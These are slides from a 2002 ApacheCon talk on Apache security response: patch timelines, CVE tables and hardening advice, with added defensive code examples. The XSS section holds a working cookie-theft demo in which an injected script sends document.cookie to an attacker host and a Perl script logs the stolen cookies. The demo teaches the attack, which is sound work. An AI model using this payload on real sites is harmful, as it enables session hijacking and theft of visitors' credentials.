Apache Security Secrets: Revealed
for ApacheCon 2002, Las Vegas
Mark J Cox
revision 1
www.awe.com/mark/apcon2002

Quick Introduction
Who am I?
• Why do you care?
• What is Security Response? Why do we need it?
• Red Hat, Apache, OpenSSL
What will we cover? What won't we cover?
Tons of extra info in the handout
• also available at www.awe.com/mark/apcon2002/

Slapper Worm
Use an example to illustrate some points
Slapper worm found September 2002
Exploited OpenSSL vulnerability
• But through Apache, therefore interesting
Look at the timeline

Timeline: July 2002 / August / September
July 19: Vulnerabilities in OpenSSL found in code audit
July 23: CERT contact us with independent verification
July 28: Linux and OpenSSL vendors notified
July 30: OpenSSL updates and announcement
July 30: Vendor updates available
Sept 13: First exploit (as a worm)
Sept 17: Full remote exploit
45 days (from vendor updates to first exploit)

Commercial or Open Source?
OpenSSL
• Established process
• 0 day "window of known risk"
• Gave time for administrators to upgrade
SSL-C and OpenSSL share common history
• Similar vulnerabilities affected SSL-C
• The timeline is interesting

Timeline: August 2002 / September / October
July 30: OpenSSL updates and announcement
July 30: Vendor updates available
Aug 8: RSA announce issue
Aug 22: RSA make fixed libraries available
Sept 10: Covalent 2.0 packages
23 days (from RSA announcement to first exploit)
70+ days (from OpenSSL announcement to Covalent packages)
Sept 13: First exploit (as a worm)
Sept 17: Full remote exploit

Who was vulnerable?
People who didn't update their systems
• Why didn't they upgrade?
Abandoned
Install and Forget
Cry Wolf (too much information)
Incorrect or misleading information
Inertia, too hard to upgrade
They thought they already had
• How can we help?
Better quality information
Easier to upgrade

Everybody thought Somebody would do it. Anybody could have done it. But Nobody did. And in the end Everybody got mad at Somebody Because... Nobody did what Anybody could have done.

Release take up

Secret: Keep your System up to date

Security Policy
Why bother?
Security response policy for Apache
• Alert Phase
• Analysis Phase
• Response Phase
• Maintenance Phase
Assumptions
• Just Apache
• Not from a vendor

Alert Phase
Where to get your information
• How the quality varies
Keep notes
Apache mailing lists
CERT CC
Bugtraq
Full Disclosure
Apache Week
Apache web site
Security Sites

Analysis Phase
What is the issue all about?
How does it affect you
• Impact on your organisation
• Threat assessment
Requires Detective work
Requires trusted information sources
• Chinese Whispers
• Press FUD

MARC
Press confusion
Spot mistakes
• "was vulnerable"
• One XSS vulnerability
• Wildcard DNS
• v1.3 wasn't vulnerable
• Matthew didn't patch
• "arbitrary actions"
• didn't bother to ask us
This always happens
• even when they ask us

Slapper Press Sans FUD

Secret: Security companies have their own agendas -- MSNBC, 16 Sep 2002

Apache and CVE
Lots of vendors ship Apache
Lots of vendors report on Apache issues
• As do the press
• As do weekly journals
Common Vulnerabilities and Exposures
• Mitre
• Dictionary
• Cross-reference with vulnerability databases
• Standardisation and Normalisation

Analysis
Things to get (from the advisory)
• Vulnerability name and identifiers
• Versions affected
• Configuration required
• Impact and severity
• Work-around
• Patches

Getting to know you
What are you running?
• Nmap
Are you vulnerable?
• Exploits
• Nessus
Dependencies

Secret: Go to the source

Response Phase
What are you going to do about it
• What is the impact?
• What policies affect it
• Upgrade to the latest version?
• or Phased approach?
• or Patch?
• or do nothing?
But make sure your source isn't a trojan

Trojan source
It's happened to OpenSSH and Sendmail
• But not to Apache. Yet

Checking the source
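The "Checking the source" step, as an added example that is not part of the talk or of the Apache project's own tooling: compare the downloaded tarball against the MD5 published beside it, and verify the detached PGP signature. The file names (apache_src.tar.gz, its .md5 and .asc companions) are assumptions; md5sum and gpg are the standard tools. A published checksum only catches a corrupt download or a mirror that replaced the tarball but not the .md5 file; the signature, checked against a signing key obtained out of band, is what actually defeats a trojaned mirror.

```shell
#!/bin/sh
# Added example (not from the talk or the Apache project): before installing a
# downloaded Apache tarball, check it against the checksum and detached PGP
# signature published beside it. File names below are assumed, not real paths.

# Compare a tarball against the MD5 published in the project's .md5 file.
# Returns 0 when the checksum matches, 1 when it does not.
verify_md5() {
    tarball="$1"
    expected="$2"
    actual=$(md5sum "$tarball" | cut -d' ' -f1)
    [ "$actual" = "$expected" ]
}

# Read the expected digest out of a "<hex>  <filename>" line as written by md5sum.
digest_from_md5_file() {
    cut -d' ' -f1 "$1"
}

# Check the detached signature, with the project's signing key already imported.
# Only a key fingerprint you obtained out of band makes this check meaningful:
# a trojaned mirror can serve a matching .md5 file, but not a valid signature.
verify_pgp() {
    tarball="$1"
    gpg --verify "$tarball.asc" "$tarball"
}

# Demonstration with a constructed file in a temporary directory (no network).
# Returns 0 when the untouched file verifies and the tampered copy is rejected.
demo() {
    dir=$(mktemp -d) || return 1
    printf 'pretend this is a source tarball\n' > "$dir/apache_src.tar.gz"
    md5sum "$dir/apache_src.tar.gz" > "$dir/apache_src.tar.gz.md5"

    good=$(digest_from_md5_file "$dir/apache_src.tar.gz.md5")
    verify_md5 "$dir/apache_src.tar.gz" "$good" || { rm -rf "$dir"; return 1; }

    # A single appended byte (what a trojaned mirror copy looks like) must fail.
    printf 'x' >> "$dir/apache_src.tar.gz"
    if verify_md5 "$dir/apache_src.tar.gz" "$good"; then
        rm -rf "$dir"
        return 1
    fi
    rm -rf "$dir"
    return 0
}
```

In practice the .md5 file is fetched from the project's own site rather than from the mirror that served the tarball, and verify_pgp is run first; only a tarball that passes both is unpacked.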
Security Policy
Maintenance Phase
Steps for recovering from compromise
• LKM rootkits
• Hope you kept a backup

Secret: assume you are going to get hacked

Secret: Keep Backups

Vendor versions
Positives
• Works out of the box
• Customised for the OS
• Tested, QA'd
• The kitchen sink
• One source of security information
• Automatic updates
• Install and forget
• Accountability
Trust
• Trust the vendor's analysis
• Trust the vendor to produce timely critical fixes
Risks
• Mix and match
• Forced to upgrade
• What did they fix

Secret: Trust your vendor (if you don't then change vendor!)

Backporting
Confuses everyone
It's no longer Apache!
So why do it?
• Customers demand it
• Too many new features
• Certification
• Quicker and painless upgrades
Problems
• Version number doesn't change
Confuses tools
Confuses Nessus
Confuses users
• Vendors have their own package versioning
inconsistent

Open source is more secure?
"Many eyes"
• How many of you have audited Apache?
• OpenSSL vulnerabilities "easily spotted"
• There are other benefits
No need for FUD

Apache's history
• Just Apache
• Normalising to CVE
Apache 1.3.0 to 1.3.27

Type of issue                   | Severity | Number of vulnerabilities
Denial of Service               | High     | 5
Show a directory listing        | Low      | 4
Read files on the system        | High     | 3
Remote arbitrary code execution | High     | 2
Cross Site Scripting            | Medium   | 2
Local privilege escalation      | Medium   | 1
Remote Root Exploit             | High     | 0

Type of issue                      | Severity | Who and When
Show the source to CGI scripts     | Medium   | SuSE Linux, 2000
Show files in /usr/doc             | Low      | Debian Linux, 1999; SuSE Linux, 2000
Read and write any file in docroot | High     | SuSE Linux, 2000
Read .htaccess files               | Medium   | Cobalt, 2000
Run arbitrary commands remotely    | High     | IBM, 2000

Secret: Apache is already pretty secure

Denial of Service
Only interesting if it's easy to do
• Bugs
Directives to help stop regular DOS
• RLimit* LimitRequest*
CVE           | Title                                       | Description
CAN-2001-1342 | Denial of service attack on Win32 and OS2   | A client submitting a carefully constructed URI could cause a General Protection Fault in a child process, bringing up a message box which would have to be cleared by the operator to resume.
none          | Denial of service attack on Win32           | There have been a number of important security fixes to Apache on Windows. The most important is that there is much better protection against people trying to access special DOS device names (such as "nul").
CAN-1999-1199 | Multiple header Denial of Service vulnerability | A problem exists when a client sends a large number of headers with the same header name. Apache uses up memory faster than the amount of memory required to simply store the received data itself.
none          | Denial of service attacks                   | Apache 1.3.2 has better protection against denial of service attacks.

Get docroot directory listings
Should be a minor impact
• As long as you don't do something silly
Disable mod_autoindex unless you need it

CVE           | Title                                                     | Description
CAN-2001-0729 | Requests can cause directory listing to be displayed      | A vulnerability was found in the Win32 port of Apache 1.3.20. A client submitting a very long URI could cause a directory listing to be returned.
CAN-2001-0731 | Multiviews can cause a directory listing to be displayed  | When Multiviews are used to negotiate the directory index, in some configurations requesting a URI with a QUERY_STRING of M=D could return a directory listing.
CAN-2001-0925 | Requests can cause directory listing to be displayed      | The default installation can lead mod_negotiation and mod_dir or mod_autoindex to display a directory listing if a very long path was created artificially by using many slashes.
CVE-2000-0505 | Requests can cause directory listing to be displayed on NT | A user could view the listing of a directory instead of the default HTML page by sending a carefully constructed request.
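The two hardening slides above ("Directives to help stop regular DOS" and "Disable mod_autoindex unless you need it") as one httpd.conf fragment for Apache 1.3. This is an added example, not from the talk or the Apache project; the directives are real, the numeric limits and the /www/htdocs/pub path are illustrative assumptions. Note that Apache does not allow comments at the end of a directive line, so every comment here is on its own line.

```apache
# Added example, not from the talk: an httpd.conf hardening fragment for
# Apache 1.3 covering the DoS-limiting directives and directory listings.
# The numeric limits and the /www/htdocs/pub path are illustrative.

# Cap what a single request may send, so one client cannot make a child
# burn memory on oversized or endlessly repeated headers (cf. CAN-1999-1199).
# LimitRequestLine: bytes in the request line (1.3 default and maximum 8190).
LimitRequestLine 4096
# LimitRequestFields: number of header fields accepted (default 100).
LimitRequestFields 40
# LimitRequestFieldSize: bytes in any one header field (default 8190).
LimitRequestFieldSize 4096
# LimitRequestBody: bytes in a request body; 0 means unlimited.
LimitRequestBody 1048576

# Resource limits for processes Apache forks to service a request (CGI,
# SSI exec). They do not apply to the httpd children themselves.
# Each takes a soft limit and an optional hard limit.
# RLimitCPU: CPU seconds.
RLimitCPU 30 60
# RLimitMEM: bytes of memory.
RLimitMEM 33554432 67108864
# RLimitNPROC: processes per uid, which also bounds fork bombs from CGI.
RLimitNPROC 20 30

# Directory listings: switch automatic indexes off everywhere, and stop
# .htaccess files from switching them back on.
<Directory />
    Options -Indexes
    AllowOverride None
</Directory>

# Re-enable a listing only where it is the intended content.
<Directory "/www/htdocs/pub">
    Options +Indexes
</Directory>

# If mod_autoindex is not needed at all and is built as a DSO, the stronger
# option is to not load it: comment out its LoadModule and AddModule lines.
```

After editing, run the server's configuration check (apachectl configtest on 1.3) before restarting; a mistyped limit is rejected at startup rather than silently ignored.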
Return arbitrary files
It's actually hard to do
• Much easier through a bad CGI or PHP script
• Use a CHROOT jail

CVE           | Title                                                          | Description
CAN-2000-0913 | Rewrite rules that include references allow access to any file | The Rewrite module, mod_rewrite, can allow access to any file on the web server. The vulnerability occurs only with certain specific cases of using regular expression references in RewriteRule directives.
CAN-2000-1204 | Mass virtual hosting can display CGI source                    | A security problem for users of the mass virtual hosting module, mod_vhost_alias, causes the source to a CGI to be sent if the cgi-bin directory is under the document root. However, it is not normal to have your cgi-bin directory under a document root.
CAN-2000-1206 | Mass virtual hosting security issue                            | A security problem can occur for sites using mass name-based virtual hosting (using the new mod_vhost_alias module) or with special mod_rewrite rules.

Arbitrary code execution
Nightmare scenario
It's only happened ONCE to Apache 1.3
• and then it was limited to some platforms
• and you didn't get root

CVE           | Title                                    | Description
CAN-2002-0392 | Apache Chunked encoding vulnerability    | Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively harmless increase in system resources through to denial of service attacks and in some cases the ability to be remotely exploited.
CAN-2002-0061 | Win32 Apache Remote command execution    | Apache for Win32 before 1.3.24 and 2.0.34-beta allows remote attackers to execute arbitrary commands via parameters passed to batch file CGI scripts.

Mitigate remote exploits
Use a CHROOT jail
"This is the best approach we can currently take against such a monolithic piece of software with such bad behaviours. It is just too big to audit, so for simple usage, we are constraining it to within that jail." -- Theo de Raadt, OpenBSD

[Figure: directory tree of the chroot jail, showing the real / with usr/, var/, home/, boot/ and www/htdocs/, and the jail's own / containing only htdocs/]

Local privilege escalation
A unique issue due to a bug
• Local Apache uid can do things as root
Cause a DOS
Kill arbitrary processes
• You can get Apache uid from CGI, Perl etc

CVE           | Title                                                          | Description
CAN-2002-0839 | Shared memory permissions lead to local privilege escalation   | The permissions of the shared memory used for the scoreboard allows an attacker who can execute under the Apache UID to send a signal to any process as root or cause a local denial of service attack.

Cross Site Scripting (XSS)
Completely misunderstood
• Let's try an example to show the attack consequences

CVE           | Title                                                       | Description
CAN-2002-0840 | Error page XSS using wildcard DNS                           | Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header.
CAN-2000-1205 | Cross-site scripting can reveal private session information | Apache was vulnerable to cross-site scripting issues. It was shown that malicious HTML tags can be embedded in client web requests if the server or script handling the request does not carefully encode all information displayed to the user. Using these vulnerabilities attackers could, for example, obtain copies of your private cookies used to authenticate you to other sites.
<!-- Attacker's page. The link points at env.cgi on www.awe.com, a script
     that echoes its query string back unescaped, so the injected <script>
     runs in the victim's browser as www.awe.com and can read its cookies. -->
<html><h1>My cute kitten</h1>
<a href="http://www.awe.com/env.cgi?<script>
document.location=
'http://www.moosezone.com/cute.cgi%3F'+document.cookie
</script>">Click here to see my cute kitten</a></html>

#!/usr/bin/perl
# cute.cgi on the attacker's server (www.moosezone.com): shows the kitten
# and appends whatever arrived in the query string, which is the victim's
# cookies for www.awe.com, to a log file.
print "Content-type: text/html\r\n\r\n";
print "<h1>Awww...</h1><img src=cutekitten.jpg>";
open(OUT, ">>/tmp/suckers");
print OUT $ENV{"QUERY_STRING"};
close(OUT);
Oops

Secret: Understand Cross-site Scripting
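The CAN-2000-1205 entry above names the fix: the script handling the request must encode everything it displays. As an added example that is not from the talk, here is the shape a safe env.cgi would take written as a shell CGI: the raw QUERY_STRING only reaches the page after html_escape has run over it, so the injected <script> from the kitten link arrives in the browser as inert text. The script name and page layout are assumptions; the escaping function is the point.

```shell
#!/bin/sh
# Added example, not from the talk: the fix for the env.cgi-style reflection
# used in the attack above is to HTML-encode everything that came from the
# request before it goes back into the page. The script name and page layout
# are assumptions; the escaping is the point.

# Encode the five characters that can change the meaning of HTML text or
# attribute values. '&' must be handled first, or it would re-encode the
# entities produced by the later substitutions.
html_escape() {
    printf '%s' "$1" | sed -e 's/&/\&amp;/g' \
                           -e 's/</\&lt;/g' \
                           -e 's/>/\&gt;/g' \
                           -e 's/"/\&quot;/g' \
                           -e "s/'/\&#39;/g"
}

# Build the page body the way a safe env.cgi would: the raw QUERY_STRING is
# passed through html_escape, so "<script>" reaches the browser as text.
render_query() {
    printf '<h1>Your query</h1><pre>%s</pre>\n' "$(html_escape "$1")"
}

# Stand-alone CGI entry point: only runs when the server set QUERY_STRING.
if [ -n "${QUERY_STRING:-}" ]; then
    printf 'Content-type: text/html\r\n\r\n'
    render_query "$QUERY_STRING"
fi
```

The same rule applies to anything else that originates with the client (Host: header, PATH_INFO, cookie values, form fields): encode at the point of output, every time, rather than trying to filter "bad" input on the way in.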
mod_rewrite canonicalisation
CVE-2001-1072, August 2001
Pass // to most rewrite rules
Including ones in our own documentation
Wrong!  RewriteRule ^/somepath(.*) /otherpath$1 [R]
Right   RewriteRule ^/+somepath(.*) /otherpath$1 [R]
http://www.awe.com/somepath/fred
http://www.awe.com//somepath/fred
...This isn't fixed!!!
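Why the "Wrong!" rule misses the second URL, as an added example that is not from the talk: the two RewriteRule patterns above are run as extended regular expressions over constructed request paths, and each path is reported as wrong:right with 1 for a match and 0 for a miss. The talk's point is that Apache handed //somepath/fred to the rule unchanged, so a pattern anchored on exactly one leading slash never fires, and any redirect or access control that rule implements is bypassed for that request; ^/+ matches one or more slashes and fires in both cases.

```shell
#!/bin/sh
# Added example, not from the talk: why "^/somepath" is the wrong anchor.
# The patterns are the two RewriteRule lines from the slide; the request
# paths are constructed. A leading run of slashes reaches the rule as sent.

# Does an extended regular expression match the given path? (0 = match)
rule_matches() {
    pattern="$1"
    path="$2"
    printf '%s\n' "$path" | grep -Eq "$pattern"
}

WRONG='^/somepath(.*)'
RIGHT='^/+somepath(.*)'

# Run both patterns over a path and report "wrong:right", with 1 for a
# match (the rule would fire) and 0 for a miss (the request slips past).
classify() {
    path="$1"
    w=0
    r=0
    rule_matches "$WRONG" "$path" && w=1
    rule_matches "$RIGHT" "$path" && r=1
    printf '%s:%s' "$w" "$r"
}

# Canonical request: both rules fire.
classify /somepath/fred
echo
# Extra leading slash: the wrong rule silently misses, so whatever
# /otherpath was meant to redirect or protect is reached directly.
classify //somepath/fred
echo
# Three slashes, same story.
classify ///somepath/fred
echo
```

Running it prints 1:1, 0:1 and 0:1. The same check is worth applying to any rule in your own configuration that is anchored with ^/ and is relied on for access control, not only the redirect shown on the slide.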
Attacks and Exploits
Who exploits Apache?
What sort of attacks
• Targeted
• Automated
Worms
Worm makeup
• Exploit portion
• Scanner portion
• Payload portion

Apache Worms
Name                                                                | Date         | Affects                                                      | Exploits
Slapper (Linux.Slapper-A, Linux.Slapper-Worm, Apache/mod_ssl Worm)  | 13 Sept 2002 | Apache with mod_ssl and OpenSSL on various Linux platforms   | CAN-2002-0656
Linux.Devnull                                                       | 30 Sept 2002 | Apache with mod_ssl and OpenSSL on various Linux platforms   | CAN-2002-0656
Scalper (Ehchapa, PHP/Exploit-Apache)                               | 28 June 2002 | Apache on OpenBSD and FreeBSD                                | CAN-2002-0392

Secrets, finally revealed
Don't Panic
Make a security policy for dealing with Apache emergencies
Mitigate the risks
Review the secrets

Secret: If this is too much effort, turn off your server

"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards -- and even then I have my doubts." -- Gene Spafford